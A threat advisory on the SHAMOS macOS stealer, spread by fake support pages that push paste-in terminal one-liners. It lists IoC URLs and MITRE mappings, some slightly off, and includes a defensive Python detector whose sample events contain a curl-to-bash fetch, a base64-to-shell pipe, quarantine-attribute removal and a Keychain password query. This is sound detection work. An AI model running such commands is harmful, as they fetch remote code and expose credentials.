
New SHAMOS Stealer Exploits One-Line Commands on macOS

Amber | Attack Report

Summary

A new cyber attack campaign targeting macOS users has emerged, leveraging SHAMOS, a variant of the Atomic macOS Stealer (AMOS). The threat actor Cookie Spider has been actively exploiting victims worldwide (except Russia) since June 2025. Using malvertising and fake support websites, users were tricked into executing one-line terminal commands that secretly downloaded SHAMOS. The malware bypassed Apple Gatekeeper, evaded detection, and exfiltrated sensitive data including credentials, Keychain entries, browser cookies, and cryptocurrency wallets. In certain cases, SHAMOS also installed additional payloads disguised as legitimate apps, highlighting the growing sophistication of macOS-targeted threats.


Attack Details

Between June and August 2025, Cookie Spider deployed SHAMOS through fraudulent troubleshooting sites. Victims searching for macOS help were redirected to fake support portals prompting them to run suspicious terminal one-liners.

Once installed, SHAMOS employed several evasion tactics:

  • Anti-VM checks to avoid sandboxes

  • Removal of Apple Gatekeeper attributes

  • Use of AppleScript for host reconnaissance

Its data theft operations focused on:

  • Browser and Keychain credentials

  • Notes and crypto wallets

  • Exfiltration via remote servers

Additionally, SHAMOS sometimes delivered secondary payloads disguised as trusted apps like Ledger Live.

The campaign’s global scale spanned the U.S., UK, Japan, China, Colombia, Canada, Mexico, and Italy, reflecting a scalable delivery model and showing that macOS users remain prime targets for credential theft and financial fraud.


Recommendations

To mitigate SHAMOS infections and strengthen macOS defenses:

  • Educate Users on Malvertising: Train employees to avoid suspicious ads, fake support pages, and one-liner terminal prompts.

  • Restrict Unsigned Scripts: Block or monitor scripts fetched with curl or wget, as well as commands obfuscated with Base64 encoding.

  • Strengthen Endpoint Monitoring: Detect behaviors linked to info-stealers such as unusual xattr use, unexpected AppleScript execution, or repeated Keychain access.

  • Monitor Data Exfiltration: Watch for abnormal traffic like repeated curl uploads or archive transfers to suspicious domains.

  • Enforce Least Privilege: Remove unnecessary admin rights to limit the impact of malware installation and persistence.
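As an added example (not part of this advisory or any HivePro tooling), the following Python rules turn the "Restrict Unsigned Scripts" and "Strengthen Endpoint Monitoring" bullets into detection logic run over a constructed sample of process-execution events; the export format, pids, paths and the support-example[.]invalid domain are assumptions.

```python
import re
from collections import Counter

# Constructed sample process-execution events (not real telemetry), one per line,
# in the form "<pid>|<parent process>|<command line>" as an EDR export might look.
SAMPLE_EVENTS = """\
4011|Terminal|curl -fsSL hxxps://support-example[.]invalid/install.sh | bash
4012|bash|echo aGVsbG8= | base64 -d | sh
4013|bash|xattr -d com.apple.quarantine /Users/alice/Downloads/Helper.app
4014|bash|osascript -e 'system info'
4015|bash|security find-generic-password -ga mail
4016|Terminal|ls -la /Users/alice
4017|Finder|open /Applications/Safari.app
"""

# (rule name, recommendation bullet it implements, regex over the command line);
# patterns are kept narrow so ordinary admin use (a plain curl download) does not trip them.
RULES = [
    ("remote_script_to_shell", "Restrict Unsigned Scripts",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("base64_decode_to_shell", "Restrict Unsigned Scripts",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(ba|z)?sh\b")),
    ("quarantine_attr_removed", "Strengthen Endpoint Monitoring",
     re.compile(r"\bxattr\b.*\s(-c|-rc|-r?d\s+com\.apple\.quarantine)\b")),
    ("applescript_exec", "Strengthen Endpoint Monitoring",
     re.compile(r"\bosascript\b")),
    ("keychain_query", "Strengthen Endpoint Monitoring",
     re.compile(r"\bsecurity\s+(find-(generic|internet)-password|dump-keychain)\b")),
]

def parse_event(line):
    """Split one export line; the command line may itself contain '|', so split at most twice."""
    pid, parent, cmd = line.split("|", 2)
    return {"pid": int(pid), "parent": parent, "cmd": cmd}

def detect(events_text):
    """Return (pid, rule_name, bullet) for every event whose command line matches a rule."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        event = parse_event(line)
        for name, bullet, pattern in RULES:
            if pattern.search(event["cmd"]):
                findings.append((event["pid"], name, bullet))
    return findings

def summarize(findings):
    """Count findings per recommendation bullet so an analyst sees which control fired."""
    return dict(Counter(bullet for _pid, _name, bullet in findings))
```

Running `detect(SAMPLE_EVENTS)` flags the first five constructed events and leaves the benign `ls` and `open` untouched.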


Indicators of Compromise (IoCs)

SHA256 Hashes:

Domains:

  • mac-safer[.]com

  • rescue-mac[.]com

URLs:

  • hxxps[:]//icloudservers[.]com/gm/install[.]sh

  • hxxps[:]//macostutorial[.]com/iterm2/install[.]sh

  • hxxps[:]//icloudservers[.]com/gm/update

  • hxxps[:]//macostutorial[.]com/iterm2/update

  • hxxps[:]//github[.]com/jeryrymoore/Iterm2


MITRE ATT&CK TTPs

  • Initial Access: TA0001 – Drive-by Compromise (T1189), User Execution (T1204)

  • Execution: TA0002 – AppleScript (T1059.002), Command Interpreter (T1059)

  • Defense Evasion: TA0005 – Obfuscated Files (T1027), Command Obfuscation (T1027.010)

  • Persistence: TA0003 – Ingress Tool Transfer (T1105)

  • Credential Access: TA0006 – Keychain Access (T1555, T1555.001)

  • Collection: TA0009 – Data from Local System (T1005)

  • Exfiltration: TA0010 – Exfiltration Over C2 (T1041)

